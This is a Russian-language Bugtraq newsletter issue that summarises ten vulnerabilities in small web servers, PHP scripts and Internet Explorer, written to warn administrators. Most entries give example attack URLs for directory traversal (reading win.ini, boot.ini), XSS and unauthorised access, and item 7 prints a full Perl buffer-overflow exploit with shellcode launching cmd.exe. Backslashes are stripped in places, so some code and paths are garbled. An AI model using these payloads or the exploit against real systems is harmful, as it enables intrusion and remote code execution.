Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Bugtraq - наиболее свежие и стоящие Вашего внимания Баги


Информационный Канал Subscribe.Ru


Вторая рассылка новостей Bugtraq'а вышла в свет
10 уязвимостей найдено за это время
Советуем прочитать их и своевременно обезопасить Ваш компьютер или сервер.
Все выпуски этой рассылки будут выкладываться в разделе Публикации -> Bugtraq


1. Plug and Play Web Server Remote Denial of Service Vulnerability


Plug and Play Web Server – Пакет, для создания и обслуживания динамических сайтов, разработанный для установки на системах, оперируемых ОС - Microsoft Windows. Также это ПО поддерживает SSL.

Уязвимость, обнаруженная в данном Программном Обеспечении, позволяет организовать DoS атаку (Denial of Service – отказ в обслуживании) на сервер. Это происходит тогда, когда атакующий посылает специально сформированный HTTP Get запрос серверу - "GET /asdf.? HTTP/1.0". После выполнения данного запроса происходит зависание прокси сервиса, выполняемое после вывода следующего сообщения - "Runtime Error 12001 - Parameter 1 of the method used is invalid or not appropriate".

Успешное использование данной уязвимости приводит к зависанию, остановке и как следствие – отказе в обслуживании данного ПО.

Plug and Play версии 1.0002c подвержен подобного рода атакам, однако другие версии этого софта также могут быть уязвимы.


2. Ashley Brown iWeb Server Encoded Backslash Directory Traversal Vulnerability

iWeb Server – небольшой HTTP сервер, используемый для внутреннего использования как часть тестового обеспечения. Было обнаружено что iWeb Server существует баг, результатом которого может стать открытие потенциально скрытой и важной информации. Уязвимость позволяет атакующему получить доступ к информации, находящейся вне корневой директории. Причиной подобной проблемы является недостаточная проверка посылаемых пользовательских данных, особенно при посылке символа обратного слеша в hex коде. Все это дает возможность беспрепятственно выходить за переделы корневой папки сервера используя - '..%5C' символьные сочетания.

Успешное использование бага позволяет атакующему получить доступ к закрытой информации, находящейся на сервере, которая в дальнейшем может быть использована для проведения последующих атак на уязвимую систему.

Пример использования данного бага –
http://127.0.0.1/.%5C..%5C..%5C.. %5C..%5C..%5C/winnt/win.ini

http://127.0.0.1/.%5C..%5C..%5C..%5C..%5C..%5C/winnt/system32/registry.inf


3. Tritanium Scripts Tritanium Bulletin Board Unauthorized Access Vulnerability

Tritanium Bulletin Board – борда, написанная на PHP.

Дыра, обнаруженная в данном ПО, позволяет получить неавторизованный доступ к нитям – запросам данного скрипта. Проблема появляется по причине недостаточной проверки вводимых пользователем данных. Атакующий может получить доступ к информации путем изменения URL указываемого в запросах на другие параметры - thread_id, forum_id и sid. Обнаружено что данная информация не генерируется случайным образом, именно по этой причине атакующий легко может получить доступ ко всем нитям – запросам этого скрипта.

Успешное использование позволяет атакующему получить доступ к закрытой информации, что может в последствии помочь в проведении других атак на уязвимую систему.

Tritanium Bulletin Board версии 1.2.3 подвержен этой атаке, однако другие версии могут быть атакованы подобным образом.

Пример использования бага

http://www.example.com/[path]/index.php?faction=reply&thread_id=[ID OF THE THREAD TO READ]&forum_id=[ID OF FORUM]&sid=[your sid]


4. HTTP Commander Directory Traversal Vulnerability

HTTP Commander – система обслуживания файлов, находящийся на серверах, используемая на Microsoft IIS серверах. HTTP Commander написан на ASP.

Обнаруженная уязвимость в данном ПО позволяет атакующему получить доступ к информации, находящейся вне корневой директории. Опять же данный баг присутствует по причине недостаточной проверки вводимых пользователем данных. Использовать эту дыру можно с помощью использования - './' символов в посылаемых запросах.

Успешное использование этой уязвимости дает возможность получить доступ к закрытой информации, что в дальнейшем поможет при проведении последующих атаках на сервер.

Пример использования данного бага

http://www.example.com/NetDemo2/OpenFile.aspx?file=././././././././boot.ini

http://www.example.com/NetDemo2/html.aspx?file=./././././././././boot.ini


5. HTTP Commander Path Disclosure Vulnerability

HTTP Commander – система обслуживания файлов, находящийся на серверах, используемая на Microsoft IIS серверах.

Обнаружено что баг, найденный в данном софте, может раскрыть директорию куда были инсталлированы файлы. Программа выдаст сообщение с полным путем на веб сервере к директории с установленными файлами вместо вывода ошибки о неправильном пользовательском запросе. Баг обнаружен при использовании 'file' параметра. Атакующий может получить доступ к определенной директории путем добавления "." аргумента в своем запросе.

Успешное использование подобной уязвимости позволит атакующему получить закрытую информацию о файловой системе сервера и помочь при проведении последующих атак.

HTTP Commander версии 4.0 подвержен подобного рода атакам однако другие версии могут также быть уязвимы.

Пример использования данного бага

http://www.example.com/NetDemo2/html.aspx?file=.

После этого будет выдано сообщение типа
Access to the path "C:WEBHOSTING4LIFE ASPNETSERGANTGUEST" is denied.
Откуда мы узнаем полный путь на сервере.


6. MPM Guestbook Cross-Site Scripting Vulnerability

MPM Guestbook – свободно распространяемое веб приложение. Написано на Php и существует как для Unix/Linux, так и для Microsoft Windows платформ.

В MPM Guestbook обнаружена уязвимость в перекрестных ссылках скрипта. По причине недостаточной проверки HTML кода, получаемого из URI параметров, выводимого на страницах, динамически генерируемых этим программным продуктом. В частности - 'lng' URI параметр не отфильтровывается.

Атакующий может использовать этот баг чтобы сгенерировать “понравившемуся” пользователю определенного типа страницу, содержащей HTML код и скрипт с необходимыми для атакующего параметрами. Теоретически это позволяет украсть куки позволяющие беспрепятственно авторизовываться на сервере. Атакующий также может влиять на поведение гостевой книги при нажатии на линк, позволяя применить рад других атак на сервер.

Пример использование данного бага

http://www.example.com/guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E


7. IA WebMail Server Long GET Request Buffer Overrun Vulnerability

Заявлено что IA WebMail подвержен атакам переполнения буфера. Причина – недостаточная проверка на наличие скобок при выполнении GET запроса. По специфике, при формировании запроса более чем 1044 байт – переполнит выделенную память предназначенную для ее хранения.

Результат – атакующий в состоянии повредить такую информацию как обратный адрес, а также эффективно контролировать точку выполнения данной программы. Все это позволит выполнить произвольный код.

Обнаружено что эта уязвимость найдена во всех версиях IA WebMail вплоть дл версии 3.1

Пример эксплоита к этому багу

#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "8180",
);
unless ($remote) { die "cannot connect to http daemon on $host" }

$remote->autoflush(1);

$shellcode = join ("",
"x90", # - NOP
"xCC", # - INT3
"x90", # - NOP
"x90", # - NOP
"x90", # - NOP
"x90", # - NOP
"x8BxEC", # - MOV EBP, ESP
"x55", # - PUSH EBP
"x8BxEC", # - MOV EBP, ESP
"x33xFF", # - XOR EDI, EDI
"x57", # - PUSH EDI
"x83xECx04", # 0 SUB ESP, 4
"xC6x45xF8x63", # - MOV BYTE PTR SS:[EBP-8],63h
"xC6x45xF9x6D", # - MOV BYTE PTR SS:[EBP-7],6Dh
"xC6x45xFAx64", # - MOV BYTE PTR SS:[EBP-6],64h
"xC6x45xFBx2E", # - MOV BYTE PTR SS:[EBP-5],2Eh
"xC6x45xFCx65", # - MOV BYTE PTR SS:[EBP-4],65h
"xC6x45xFDx78", # - MOV BYTE PTR SS:[EBP-3],78h
"xC6x45xFEx65", # - MOV BYTE PTR SS:[EBP-2],65h
"xB8xC3xAFx01x78", # - MOV EAX, MSVCRT.system
"x50", # - PUSH EAX
"x8Dx45xF8", # - LEA EAX, DWORD PTR SS:[EBP-8]
"x50", # - PUSH EAX
"xFFx55xF4", # - CALL DWORD PTR SS:[EBP-C]
"x5F" # - POP EDI
);

$eip = "x4cxf8x12";

#0012f84C

#$eip = "AAAA";
$request = join ("", "GET /", $shellcode, "A"x(1040-length($shellcode)),
$eip, " HTTP/1.1r
Host: $hostr
Connection: closer
r
rn");

print $remote $request;
sleep(1);

close $remote;


8. OpenAutoClassifieds Listing Parameter Cross-Site Scripting Vulnerability

OpenAutoClassifieds – систематизированный скрипт таблицы с открытым кодом, написанный на PHP.

Уязвимость этого скрипта в составлении перекрестных ссылок.

Причина – недостаточная проверка вводимых пользователем данных при использовании 'listings' параметра. HTML и скрипт код будет добавлен при формировании пользовательских страниц, что позволит атакующему составлять произвольные ссылки, содержащие любой код.

Успешное использование этого бага позволяет украсть куки беспрепятственного захода на сайт, находящиеся на пользовательском компьютере. По причине того что атакующий может влиять на содержание сайта очевидно, что проведение других атак также возможно в данном случае.

OpenAutoClassifieds версии 1.0 подвержена подобного рода атакам однако другие версии могут также быть уязвимы.

Пример использования данного бага

http://www.example.com/openautoclassifieds/friendmail.php?listing=


9. Microsoft Internet Explorer Double Slash Cache Zone Bypass Vulnerability

Уязвимость, найденная в IE, может позволить кэшируемой информации получаемой в Интернете влиять на локальную зону компьютера. Обычно, кэшируемый контент будет лимитирован в Интернете, по причине соблюдения безопасности при выполнении команд, однако, благодаря этому багу, возможно выполнение кода как будто он находится на локальной машине : т.е. без соблюдения некоторых ограничений.

Эта ошибка возникает в результате добавления дополнительного слеша при ссылке на кэшированный контент с веб страницы.

Пример

[SysDrive]:Documents and Settings[user_name]Local SettingsTemporary Internet FilesContent.IE5

Этот слеш перед "Documents and Settings" дает понять что дальнейшее выполнение команды будет выполнено с привилегиями локальной зоны. В сочетании с другими уязвимостями этот баг может вести к выполнению любого кода на клиентской машине. Была разработана демонстрация для подтверждения выполнения произвольного кода на компьютере. Эта уязвимость все еще исследуется на выявление дополнительной информации.

Пример демонстрации - http://www.safecenter.net/UMBRELLAWEBV4/execdror5/execdror5-Demo/default.htm

Архив - http://www.safecenter.net/UMBRELLAWEBV4/execdror5/execdror5-Demo.zip


10. Microsoft Internet Explorer Self Executing HTML Arbitrary Code Vulnerability

Microsoft Internet Explorer – содержит уязвимость заключающуюся в выполнения произвольного кода.

Ошибка обнаруживается когда IE преобразует произвольный HTML код с самовыполняемым контентом, который вставлен в код определенным образом. Было продемонстрировано что атакующий может использовать эту уязвимость для выполнения произвольного кода путем создания определенных веб страниц, содержащих visual basic скрипты, созданных для указания и выполнения команд на этой же странице в качестве строковых переменных. Когда страница создана – скрипт исполняет код с привилегией пользователя, использующего уязвимый веб браузер.

Следует заметить, что версии 5.5 и 6.0 – подвержены данной уязвимости, возможно другие версии также имеют этот баг.

Пример использования этого бага –

http://www.malware.com/self-exec.zip


Информационная поддержка рассылки -
:: Novorossiysk >> OnLine ::
www.novonline.ru

http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное